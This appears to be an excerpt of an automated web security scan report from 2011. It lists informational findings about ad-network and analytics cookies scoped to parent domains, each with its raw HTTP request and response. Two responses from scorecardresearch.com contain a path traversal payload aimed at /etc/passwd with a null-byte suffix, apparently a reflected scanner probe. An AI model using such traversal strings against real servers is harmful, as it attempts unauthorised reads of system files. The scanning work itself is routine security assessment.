Set-Cookie: rsiPus_ar9b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Iei_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h03W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QYQn="MLtXrt8vtl9rIAF9m8HM9CRwtSv8pwYgsssFOu5OTeOlKAZz5+/wuXtI5aPioHhhdEjAIagkY/G8GHOoPBTZKbe4LvfbnbdkKhONXmKkgHQgdLckCXP0Ycf6bL86yMYbL1uMiqL/s6MNej7gFcLrWQkAx8c6IYdi+yDQifN3Qycz6Jj1em6Y5Eay9ZRgmRVQd4wL1CPn/dRQ4JoZ5iAZWwFtgtxpYZ2eGJoLULxN8vLRSvbSAvOi3Mra/1wX6oTWmDs4ThHYmdgsHYPtkd1lfMJC8ZS8jNp4O4oZuhx+vDf6G8BYd19mNkCBOkzH6Y5GDSLMLc63IB0="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJT+nPwIU1E3iQP/BkuMwYFC/diQV0mvz1kXs5llWevPI1xyt5IqzZ0HDpONBtYN5cOLq0Y0MDID8b06p+8YfclUA4HvE3pDVHOKpUDklOCk54RC6OSRkNnczdlHDXHWQC6K2swSQQ8vVN2F0i59OQ6jp4qiSUEONuY85ZLA1Z2OyLU7/10FZsW1qEmbSN89x1MtT5/YXPu6DPZWarOszUzHMAM6vuE+ScvdcP+yZdGgOlHPP/W1ItoFBhTdC6A1Odb9j1OcflxsGDAS+oJUNSD9BzBZwRhj081y7EhoDAlJhbCbdrv1IH+PUUcSGeWWa22CRI45O5ghe229XFch3R1pn6IVPDoJ0f2o2u6pC5soNdicK1r6OIJtTUJYNMJ4Aokj2+wkCi6Dq0alCMv+y91oSzdzJML8XwFhOstZBVOK/yZnmnfQ8mrl2zxNd4jrDQdB3J8hekQlKbwyg04s/a+Xgg6dTRJxRGxiQzc14wcItC4fC6wLc1No6sCqhw3U73G0sjkmOFoTzvKDWN/3nGjFh+adnq0HcLMjR+YKLjDY0tNuQMWEuFltUlAgfqrTRFHxgP/Fn38NCegLSnmgcUO8uIjl9mnNIBv0OpuMGKyGSX7f87985TmujaEs7n4Xy3a8QwtAnyqvCVqWpaHblOUXKl/U05rcz/at/8Kjpeuta5HGv1ZFOr7VvUY+fz9KlfFudANzZAm9Lcnecfk7HsAOBfj/bdkFmEFQ/TOgsExdf2KuIMzN7undJHKkdiOaTnklC9BA1XtwilEI3jTiWQFnsJhae+MXm28ZbizmAiaW7ESZH/CbfiHSOihUPQmrIEP0CEiOHkmwIIoboUPBGX66D1fSP1Oqj1qIKDU2VCS7592sVuMDhONvjwIUedzswvIQMf5g="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:57:01 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.10. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035630&c3=&c4=&c5=&c6=&c15=&ns__t=1315097328739&ns_c=UTF-8&c8=Notre%20Dame%2C%20Michigan%20stadiums%20cleared%20due%20to%20storms%20%7C%20Reuters&c7=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&c9=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:48:11 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.11. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:52:26 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:52:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.12. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=189535721&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:06:36 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:06:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.13. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=2925993182975414771 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app603
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 00:56:36 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 00:56:36 GMT; Path=/
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:56:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.14. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025 HTTP/1.1
Host: c.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSC=TmLJ3w**; CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMST=TmLJ305iyskD; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyskAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 04 Sep 2011 00:48:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
Set-Cookie: CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
Set-Cookie: CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ck/10105-135615
...[SNIP]...

11.15. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=1&3pid=2925993182975414771 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n15 ( lax-agg-n48), ms lax-agg-n48 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Mon, 05 Sep 2011 00:58:08 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

11.16. http://cm.npc-mcclatchy.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

11.17. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7261694771272195332; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.18. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.19. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.20. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.21. http://i.casalemedia.com/imp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /imp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp.gif?c=89733&cr=235451 HTTP/1.1
Host: i.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=102679&1315097055; CMST=TmLJ305iyd8B; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:53:06 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT

GIF89a.............!.......,...........D..;

11.22. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120
Date: Sun, 04 Sep 2011 00:57:20 GMT
Content-Length: 0


11.23. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2925993182975414771 HTTP/1.1
Host: image2.pubmatic.com
